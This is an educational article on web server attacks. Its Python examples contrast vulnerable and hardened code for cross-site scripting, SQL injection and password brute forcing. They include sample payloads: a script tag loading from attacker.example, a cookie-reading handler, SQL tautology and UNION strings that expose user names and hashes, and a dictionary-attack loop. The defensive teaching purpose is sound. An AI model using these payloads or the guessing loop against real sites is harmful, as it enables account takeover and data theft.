What Are the Common Types of Attack on Web Servers?
by Chad Anderson
A malicious attacker has numerous methods available to compromise Web servers. A Web application depends on a stack of interlocking components to function, which means the server's administrator must keep watch over databases, markup languages such as XML, script interpreters and much more. Every website hosted on a server can, through flaws in its own code, expose the server to compromise. The attacks are broad and numerous, but they fall into a few recognizable categories.
Cross-Site Scripting
Cross-site scripting (XSS), according to White Hat Security, is the most common problem on websites, with over 80 percent of sites surveyed being vulnerable. XSS lets an attacker run script of their choosing in a victim's browser, in the context of the vulnerable site, rather than on the server itself; the server's role is to reflect or store the malicious input and serve it back to other visitors. The problem arises when input from search boxes or form fields is placed into a page without being properly encoded for its HTML context. A string that is not encoded can break out of the surrounding markup and load a script, often hosted on an attacker's site, which then runs with the site's privileges in the visitor's browser: stealing session cookies, reading page content or submitting actions as the victim.
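The encoding failure described above, as an added example that is not part of the original article: a search page that interpolates the query into HTML without encoding, beside the same page with the input encoded for element-body and attribute context. The payload string, the attacker.example host and the function names are constructed for illustration.

```python
import html

# Constructed attacker input, as a search box or comment form might receive it.
# The attacker.example host is a placeholder, not a real site.
XSS_PAYLOAD = '<script src="https://attacker.example/steal.js"></script>'

# A second constructed payload aimed at an attribute context: it closes the
# value="" attribute and adds an event handler.
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)'


def render_search_unsafe(query: str) -> str:
    """Vulnerable: raw user input is concatenated into HTML, so any markup in
    the query is parsed by the browser instead of being displayed as text."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Hardened: html.escape() encodes < > & " ' for the element-body context,
    so the browser shows the payload as literal text and executes nothing."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_prefill_unsafe(query: str) -> str:
    """Vulnerable: echoing the query back into a form field without encoding
    lets a quote character terminate the attribute and inject a handler."""
    return f'<input type="text" name="q" value="{query}">'


def render_prefill_safe(query: str) -> str:
    """Hardened: with quote=True the quotes become &quot; and cannot close
    the attribute, so the whole payload stays inside value=""."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'


def contains_live_script(rendered: str) -> bool:
    """Illustrative check only: does the output still hold a raw <script tag
    or an unencoded inline event handler that a browser would act on?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onfocus="' in lowered


if __name__ == "__main__":
    for label, fn in (("unsafe", render_search_unsafe), ("safe", render_search_safe)):
        out = fn(XSS_PAYLOAD)
        print(f"{label}: live script = {contains_live_script(out)}\n  {out}")
    for label, fn in (("unsafe", render_prefill_unsafe), ("safe", render_prefill_safe)):
        out = fn(ATTR_PAYLOAD)
        print(f"{label}: live script = {contains_live_script(out)}\n  {out}")
```

The point of the two safe functions is that encoding must match the context the data lands in: the same `html.escape` call covers element bodies and quoted attributes, but data placed inside a JavaScript string, a URL or a CSS value needs that context's own encoding, and a template engine that auto-escapes is the reliable way to get this right everywhere.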
SQL Injection
SQL is the most common database language used alongside Web servers, and SQL databases store and serve large amounts of user information, including user names, password hashes and financial records. As with XSS, an SQL injection attack relies on unsanitized input: text from a form or URL is concatenated into a query so that it changes the query's structure, letting the attacker read data they should not see, insert or alter records, or in some cases bypass a login check altogether. Even a simple injection can return a full list of user names, often the first step toward compromising an account.
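The injection and the user-name enumeration it enables, as an added example that is not from the original article: a lookup built by string concatenation beside the parameterized version, run against an in-memory SQLite table. The table, the three sample users and their placeholder hashes are constructed for the example.

```python
import sqlite3

# Constructed sample rows; the hash strings are placeholders, not real digests.
SAMPLE_USERS = [
    ("alice", "pbkdf2$sha256$a1b2c3", "alice@example.com"),
    ("bob", "pbkdf2$sha256$d4e5f6", "bob@example.com"),
    ("carol", "pbkdf2$sha256$0718aa", "carol@example.com"),
]

# Constructed attacker inputs. The first makes the WHERE clause always true
# and enumerates every user name; the second appends a UNION so the result
# column carries password hashes instead of names.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
UNION_PAYLOAD = "' UNION SELECT password_hash FROM users --"


def build_db() -> sqlite3.Connection:
    """Create the throwaway users table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "password_hash TEXT NOT NULL, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, email) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    conn.commit()
    return conn


def lookup_unsafe(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the user name is spliced into the SQL text, so quote
    characters in it become part of the query's grammar."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: a bound parameter is sent as data, never parsed as SQL, so
    the payloads above simply match no row."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    db = build_db()
    print("unsafe, tautology :", lookup_unsafe(db, TAUTOLOGY_PAYLOAD))
    print("unsafe, union     :", lookup_unsafe(db, UNION_PAYLOAD))
    print("safe,   tautology :", lookup_safe(db, TAUTOLOGY_PAYLOAD))
    print("safe,   union     :", lookup_safe(db, UNION_PAYLOAD))
```

Note that the unsafe query also breaks on honest input such as `o'brien`, which raises a syntax error; a spike of such database errors in the application log is a common early sign that someone is probing for injection.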
Brute Force Attacks
The brute force attack requires little technical knowledge and is the reason most websites lock out a user name after five or so consecutive failed password attempts. In a brute force attack, the attacker works through a list of candidate passwords for a given user name until one is accepted. This is usually done with a dictionary file tailored to the target (common passwords, words related to the site or to the user) so that likely passwords are tried first. A related angle is guessing the answer to a user's security question: an attacker who gathers enough personal information about the user can answer one or more of the questions and use the password-reset flow to change the account password.
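A dictionary attack against a login endpoint, with and without the lockout rule the paragraph mentions, as an added example that is not from the original article. The LoginService class, its five-failure threshold, the word list and the sample account are constructed for illustration; the password hashing uses PBKDF2 from the standard library.

```python
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5            # lock the name after this many consecutive failures
LOCKOUT_SECONDS = 15 * 60   # how long the name stays locked
PBKDF2_ITERATIONS = 100_000  # illustrative cost; production should tune this


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


class LoginService:
    """Toy authentication service with a per-user-name lockout counter.
    clock is injectable so lockout expiry can be tested without sleeping."""

    def __init__(self, max_failures=MAX_FAILURES, lockout_seconds=LOCKOUT_SECONDS,
                 clock=time.monotonic):
        self.max_failures = max_failures      # 0 disables the lockout
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self.users = {}         # username -> (salt, pbkdf2 hash)
        self.failures = {}      # username -> consecutive failed attempts
        self.locked_until = {}  # username -> clock value when the lock expires

    def add_user(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.users[username] = (salt, hash_password(password, salt))

    def attempt(self, username: str, password: str) -> str:
        """Return 'ok', 'bad_password' or 'locked'."""
        now = self.clock()
        if self.locked_until.get(username, 0) > now:
            return "locked"
        record = self.users.get(username)
        # Hash even for unknown names so response time does not reveal
        # which user names exist.
        salt, stored = record if record else (b"\x00" * 16, b"\x00" * 32)
        ok = record is not None and hmac.compare_digest(hash_password(password, salt), stored)
        if ok:
            self.failures.pop(username, None)
            return "ok"
        count = self.failures.get(username, 0) + 1
        self.failures[username] = count
        if self.max_failures and count >= self.max_failures:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures.pop(username, None)
            return "locked"
        return "bad_password"


def dictionary_attack(service: LoginService, username: str, wordlist):
    """Try each guess in order. Returns (password_or_None, attempts_made)."""
    for attempts, guess in enumerate(wordlist, start=1):
        result = service.attempt(username, guess)
        if result == "ok":
            return guess, attempts
        if result == "locked":
            return None, attempts
    return None, len(wordlist)


# Constructed word list, ordered the way a tailored dictionary would be:
# most common guesses first.
WORDLIST = ["123456", "password", "qwerty", "letmein", "welcome",
            "admin", "football", "sunshine"]


if __name__ == "__main__":
    open_svc = LoginService(max_failures=0)
    open_svc.add_user("alice", "sunshine")
    print("no lockout :", dictionary_attack(open_svc, "alice", WORDLIST))
    locked_svc = LoginService()
    locked_svc.add_user("alice", "sunshine")
    print("lockout    :", dictionary_attack(locked_svc, "alice", WORDLIST))
```

Two caveats a practitioner should keep in mind: a per-user-name lock lets anyone deny service to a legitimate user by sending five wrong passwords, and it does nothing against the reverse pattern of trying one common password across many user names, which is why lockout is usually combined with per-source rate limiting and monitoring of failure volume.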
Buffer Overflows
A buffer overflow is a programming defect that can lead to a security breach. It occurs when an application writes more data into a fixed-size memory buffer than the buffer can hold, so that the excess spills into adjacent memory. At best this corrupts the program's state and crashes it; at worst it lets an attacker execute arbitrary code on the system and, if the exploit is crafted properly, gain a command shell with the privileges of the vulnerable process. Buffer overflows are largely a problem of the natively compiled software on the server (the Web server itself, its modules and the operating system) rather than of the Web application's own code, which is why keeping that software patched with regular updates eliminates most of the exposure.